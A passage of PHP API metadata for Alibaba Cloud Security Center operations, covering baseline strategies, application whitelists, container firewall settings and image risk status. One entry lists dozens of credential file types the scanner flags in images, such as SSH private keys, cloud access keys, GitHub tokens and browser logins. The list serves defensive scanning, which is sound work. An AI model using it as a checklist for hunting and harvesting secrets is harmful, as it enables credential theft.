'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline check strategy.'."\n" ."\n" .'> You can call the [DescribeImageBaselineStrategy](~~DescribeImageBaselineStrategy~~) API to obtain the value of this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '8639', 'title' => ''], ], [ 'name' => 'StrategyName', 'in' => 'query', 'schema' => ['description' => 'The name of the baseline check strategy.', 'type' => 'string', 'required' => false, 'example' => 'default', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese.'."\n" ."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. If you do not specify this parameter, the operation queries image baseline strategies by default. Valid values:'."\n" ."\n" .'- **default**: image'."\n" ."\n" .'- **agentless**: agentless', 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], [ 'name' => 'ImageVulClean', 'in' => 'query', 'allowEmptyValue' => true, 'schema' => ['description' => 'The baseline risk retention period, in days.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '90', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '9AB5D3DE-6E0F-5633-AA71-4B90C724****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"9AB5D3DE-6E0F-5633-AA71-4B90C724****\\"\\n}","type":"json"}]', 'title' => 'SaveImageBaselineStrategy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SaveImageBaselineStrategy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:SaveImageBaselineStrategy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'SaveSuspEventUserSetting' => [ 'summary' => 'Saves alert settings.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '157281', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The data source of the exception. Set the value to sas.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'LevelsOn', 'in' => 'query', 'schema' => ['description' => 'The severities of alert notifications. Valid values:'."\n" ."\n" .'* **remind**'."\n" .'* **suspicious**'."\n" .'* **serious**'."\n", 'type' => 'string', 'required' => false, 'example' => 'suspicious,serious,remind', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'AE6229A0-BDBE-534C-A3F8-095EBXXXXXX', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"AE6229A0-BDBE-534C-A3F8-095EBXXXXXX\\"\\n}","type":"json"}]', 'title' => 'SaveSuspEventUserSetting', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SaveSuspEventUserSetting'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:SaveSuspEventUserSetting', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'SaveWhiteListStrategy' => [ 'summary' => 'Creates an application whitelist policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '92437', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. It is automatically obtained by the system.'."\n", 'type' => 'string', 'required' => false, 'example' => '124.89.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the application whitelist policy.'."\n" ."\n" .'> You can call the [DescribeWhiteListStrategyList](~~DescribeWhiteListStrategyList~~) operation to query the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '8494', 'title' => ''], ], [ 'name' => 'StrategyName', 'in' => 'query', 'schema' => ['description' => 'The name of the application whitelist policy.'."\n", 'type' => 'string', 'required' => true, 'example' => 'test', 'title' => ''], ], [ 'name' => 'StudyTime', 'in' => 'query', 'schema' => ['description' => 'The duration of intelligent learning. Unit: hours.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '2', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'StrategyId' => ['description' => 'The ID of the application whitelist policy.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '8634', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '5DFD6277-CC36-57F7-ACE6-F5952XXXX', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"StrategyId\\": 8634,\\n \\"RequestId\\": \\"5DFD6277-CC36-57F7-ACE6-F5952XXXX\\"\\n}","type":"json"}]', 'title' => 'SaveWhiteListStrategy', 'description' => 'The application whitelist feature is in public preview. You cannot apply for a trial of the feature. If you applied for a trial of the feature or enabled the feature, you can call this operation.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SaveWhiteListStrategy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:SaveWhiteListStrategy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'SaveWhiteListStrategyAssets' => [ 'summary' => 'Manages the servers to which an application whitelist policy is applied.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '92438', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. It is automatically obtained by the system.'."\n", 'example' => '115.193.XX.XX', 'required' => false, 'type' => 'string', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese.'."\n" .'* **en**: English.'."\n", 'example' => 'zh', 'required' => false, 'type' => 'string', 'title' => ''], ], [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the policy.'."\n" ."\n" .'> You can call the [DescribeWhiteListStrategyList](~~DescribeWhiteListStrategyList~~) operation to query the ID.'."\n", 'example' => '2730', 'format' => 'int64', 'required' => true, 'type' => 'integer', 'title' => ''], ], [ 'name' => 'Operations', 'in' => 'query', 'schema' => ['description' => 'The operation that you want to perform. This parameter is in the JSON format. The value is case-sensitive. The value contains the following fields:'."\n" ."\n" .'* **status**: the operation. Valid values:'."\n" ."\n" .' * **0**: the delete operation.'."\n" .' * **1**: the add operation.'."\n" ."\n" .'* **target**: the UUID of the server.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain the value of **target** from the response parameter Uuid.'."\n", 'example' => '[{"status":0,"target":"c98dcd24-fa57-4759-b5ec-f8a4ffeed****"}]', 'required' => true, 'type' => 'string', 'title' => ''], ], [ 'name' => 'RelationType', 'in' => 'query', 'schema' => ['description' => 'The type of the policy. Valid values:'."\n" ."\n" .'* **1**: learning policy.'."\n" .'* **2**: application policy.'."\n", 'example' => '1', 'format' => 'int32', 'required' => true, 'type' => 'integer', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The returned data.'."\n", 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-XXXX', 'type' => 'string', 'title' => ''], ], 'type' => 'object', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-XXXX\\"\\n}","type":"json"}]', 'title' => 'SaveWhiteListStrategyAssets', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:SaveWhiteListStrategyAssets', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'SendCustomizeReport' => [ 'summary' => 'Sends a security daily report to a specified email address. Only security reports with a custom time period as the report cycle are supported.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '92439', 'abilityTreeNodes' => ['FEATUREsasAT4UY0'], ], 'parameters' => [ [ 'name' => 'ReportId', 'in' => 'query', 'schema' => ['description' => 'The report ID.'."\n" .'>Call [DescribeCustomizeReportList](~~DescribeCustomizeReportList~~) to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '2BEA397D-1FD0-5C79-AB24-EC051158****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Send a security report', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '1', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SendCustomizeReport'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:SendCustomizeReport', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"2BEA397D-1FD0-5C79-AB24-EC051158****\\"\\n}","type":"json"}]', ], 'SetBuildRiskDefineRuleConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '234943', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'The risk items in the risk scan configuration for image build instructions. Valid values:'."\n" .'- **classKey**: the ClassKey field value from RuleTree'."\n" .'- **ruleList**: the RuleKey field values under RuleList'."\n" .'> Call the [GetBuildRiskDefineRuleConfig](~~GetBuildRiskDefineRuleConfig~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '['."\n" .' {'."\n" .' "classKey": "other",'."\n" .' "ruleList": ['."\n" .' "add",'."\n" .' "apk"'."\n" .' ]'."\n" .' }'."\n" .']', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the risk scan configuration for image build instructions.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: Successful.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'BA674E4B-00CF-5DEA-8B92-360862FB5133', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Modify risk scan configuration for image build instructions', 'summary' => 'Modifies the risk scan configuration for image build instructions.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetBuildRiskDefineRuleConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:SetBuildRiskDefineRuleConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Id\\": 1\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"BA674E4B-00CF-5DEA-8B92-360862FB5133\\"\\n}","type":"json"}]', ], 'SetClusterInterceptionConfig' => [ 'summary' => 'Configures the status of the container firewall feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92440', 'abilityTreeNodes' => ['FEATUREsas5HPCI8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ClusterIds', 'in' => 'query', 'schema' => ['description' => 'The ID of the cluster. Separate multiple cluster IDs with commas (,).'."\n" ."\n" .'> You can call the [ListClusterInterceptionConfig](~~ListClusterInterceptionConfig~~) operation to query the IDs of clusters.'."\n", 'type' => 'string', 'required' => true, 'example' => 'c60b77fe62093480db6164a3c2fa****', 'title' => ''], ], [ 'name' => 'SwitchType', 'in' => 'query', 'schema' => ['description' => 'The type of the switch that you want to configure. Valid values:'."\n" ."\n" .'* **0**: the interception switch'."\n" .'* **1**: the interception type switch'."\n" .'* **2**: the interception history switch'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], ], [ 'name' => 'SwitchOn', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to turn on the switch. Valid values:'."\n" ."\n" .'* **1**: yes'."\n" .'* **0**: no'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Result' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '74AB990C-539B-579B-9239-B8A2036B7337', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Result\\": true,\\n \\"RequestId\\": \\"74AB990C-539B-579B-9239-B8A2036B7337\\"\\n}","type":"json"}]', 'title' => 'SetClusterInterceptionConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetClusterInterceptionConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:SetClusterInterceptionConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'SetImageBuildRiskStatus' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'RiskKey', 'in' => 'query', 'schema' => ['description' => 'The risk keyword.', 'type' => 'string', 'required' => false, 'example' => 'risk.type', 'title' => ''], ], [ 'name' => 'ImageUuids', 'in' => 'query', 'schema' => ['description' => 'The image UUIDs. Separate multiple UUIDs with commas (,).'."\n" .'>Call the [DescribeImageInstances](~~DescribeImageInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'f382fccd88b94c5c8c864def681*****,ac32fccd88b94c5c8c864def681*****', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status. Valid values:'."\n" .'- **0**: Unhandled.'."\n" .'- **1**: Ignored.'."\n" .'- **2**: False positive.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '273698***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information about the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '52870893-48A7-5A9E-9E05-6253E5B6****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Set image build risk status', 'summary' => 'Sets the risk status of image builds.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetImageBuildRiskStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:SetImageBuildRiskStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Id\\": 0\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"52870893-48A7-5A9E-9E05-6253E5B6****\\"\\n}","type":"json"}]', ], 'SetImageSensitiveFileStatus' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '195580', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'SensitiveFileKey', 'in' => 'query', 'schema' => ['description' => 'The alert type of the sensitive file. Valid values:'."\n" ."\n" .'* **npm_token**: Node Package Manager (NPM) access token.'."\n" .'* **ftp_cfg**: FTP configuration.'."\n" .'* **google_oauth_key**: Google OAuth key.'."\n" .'* **planetscale_passwd**: PlanetScale password.'."\n" .'* **github_ssh_key**: Github SSH key.'."\n" .'* **msbuild_publish_profile**: MSBuild publish profile.'."\n" .'* **fastly_cdn_token**: Fastly CDN token.'."\n" .'* **ssh_private_key**: SSH private key.'."\n" .'* **aws_cli**: Amazon Web Services (AWS) CLI credential.'."\n" .'* **cpanel_proftpd**: cPanel ProFTPD credential.'."\n" .'* **postgresql_passwd**: PostgreSQL password file.'."\n" .'* **discord_client_cred**: Discord client credential.'."\n" .'* **rails_database**: Rails database configuration.'."\n" .'* **aws_access_key**: AWS access key.'."\n" .'* **esmtp_cfg**: Extended Simple Mail Transfer Protocol (ESMTP) configuration.'."\n" .'* **docker_registry_cfg**: configuration of a Docker image repository.'."\n" .'* **pem**: Privacy-Enhanced Mail (PEM).'."\n" .'* **common_cred**: common credential.'."\n" .'* **sftp_cfg**: Secure File Transfer Protocol (SFTP) connection configuration.'."\n" .'* **grafana_token**: Grafana token.'."\n" .'* **slack_token**: Slack token.'."\n" .'* **ec_private_key**: Elliptic Curve (EC) private key.'."\n" .'* **pypi_token**: upload token for the Python Package Index (PyPI).'."\n" .'* **finicity_token**: Finicity token.'."\n" .'* **k8s_client_key**: private key for the Kubernetes client.'."\n" .'* **git_cfg**: Git configuration.'."\n" .'* **django_key**: Django key.'."\n" .'* **jenkins_ssh**: Jenkins SSH configuration file.'."\n" .'* **openssh_private_key**: OpenSSL private key.'."\n" .'* **square_oauth**: OAuth credential for Square.'."\n" .'* **typeform_token**: Typeform token.'."\n" .'* **common_database_cfg**: general database connection configuration.'."\n" .'* **wordpress_database_cfg**: WordPress database configuration.'."\n" .'* **googlecloud_api_key**: API key for Google Cloud.'."\n" .'* **vscode_sftp**: VSCode SFTP configuration.'."\n" .'* **apache_htpasswd**: Apache htpasswd.'."\n" .'* **planetscale_token**: PlanetScale token.'."\n" .'* **contentful_preview_token**: preview token for Contentful.'."\n" .'* **php_database_cfg**: database password for a PHP application.'."\n" .'* **atom_remote_sync**: Atom remote synchronization configuration.'."\n" .'* **aws_session_token**: AWS session token.'."\n" .'* **atom_sftp_cfg**: Atom SFTP configuration.'."\n" .'* **asana_client_private_key**: private key for the Asana client.'."\n" .'* **tencentcloud_ak**: secret ID of a third-party cloud.'."\n" .'* **rsa_private_key**: Rivest-Shamir-Adleman (RSA) private key.'."\n" .'* **github_personal_token**: personal access token for GitHub.'."\n" .'* **pgp**: Pretty Good Privacy (PGP) encrypted file.'."\n" .'* **stripe_skpk**: Stripe secret key.'."\n" .'* **square_token**: Square access token.'."\n" .'* **rails_carrierwave**: file upload credential for Rails Carrierwave.'."\n" .'* **dbeaver_database_cfg**: DBeaver database configuration.'."\n" .'* **robomongo_cred**: RoboMongo credential.'."\n" .'* **github_oauth_token**: OAuth access token for GitHub.'."\n" .'* **pulumi_token**: Pulumi token.'."\n" .'* **ventrilo_voip**: Ventrilo VoIP server configuration.'."\n" .'* **macos_keychain**: macOS keychain.'."\n" .'* **amazon_mws_token**: Amazon MWS token.'."\n" .'* **dynatrace_token**: Dynatrace token.'."\n" .'* **java_keystore**: Java KeyStore (JKS).'."\n" .'* **microsoft_sdf**: Microsoft SQL Server Compact Edition (CE) database.'."\n" .'* **kubernetes_dashboard_cred**: user credential for Kubernetes Dashboard.'."\n" .'* **atlassian_token**: Atlassian token.'."\n" .'* **rdp**: remote desktop protocol (RDP).'."\n" .'* **mailgun_key**: Mailgun webhook signing key.'."\n" .'* **mailchimp_api_key**: API key for Mailchimp.'."\n" .'* **netrc_cfg**: .netrc configuration file.'."\n" .'* **openvpn_cfg**: configuration of the OpenVPN client.'."\n" .'* **github_refresh_token**: GitHub refresh token.'."\n" .'* **salesforce**: Salesforce credential.'."\n" .'* **salesforce**: Sendinblue token.'."\n" .'* **pkcs_private_key**: PKCS#12 key.'."\n" .'* **rubyonrails_passwd**: Ruby on Rails password file.'."\n" .'* **filezilla_ftp**: FileZilla FTP configuration.'."\n" .'* **databricks_token**: Databricks token.'."\n" .'* **gitLab_personal_toke**: personal access token for GitLab.'."\n" .'* **rails_master_key**: Rails master key.'."\n" .'* **sqlite**: SQLite3 or SQLite database.'."\n" .'* **firefox_logins**: Firefox logon configuration.'."\n" .'* **mailgun_private_token**: Mailgun private token.'."\n" .'* **joomla_cfg**: Joomla configuration.'."\n" .'* **hashicorp_terraform_token**: HashiCorp Terraform token.'."\n" .'* **jetbrains_ides**: JetBrains IDEs configuration.'."\n" .'* **heroku_api_key**: Heroku API key.'."\n" .'* **messagebird_token**: MessageBird token.'."\n" .'* **github_app_token**: Github app token.'."\n" .'* **hashicorp_vault_token**: HashiCorp Vault token.'."\n" .'* **pgp_private_key**: PGP private key.'."\n" .'* **sshpasswd**: SSH password.'."\n" .'* **huaweicloud_ak**: secret access key of a third-party cloud.'."\n" .'* **aws_s3cmd**: AWS S3cmd configuration.'."\n" .'* **php_config**: PHP configuration.'."\n" .'* **common_private_key**: common private key.'."\n" .'* **microsoft_mdf**: Microsoft SQL Server database.'."\n" .'* **mediawiki_cfg**: MediaWiki configuration.'."\n" .'* **jenkins_cred**: Jenkins credential.'."\n" .'* **rubygems_cred**: RubyGems credential.'."\n" .'* **clojars_token**: Clojars token.'."\n" .'* **phoenix_web_passwd**: Phoenix web credential.'."\n" .'* **puttygen_private_key**: PuTTYgen 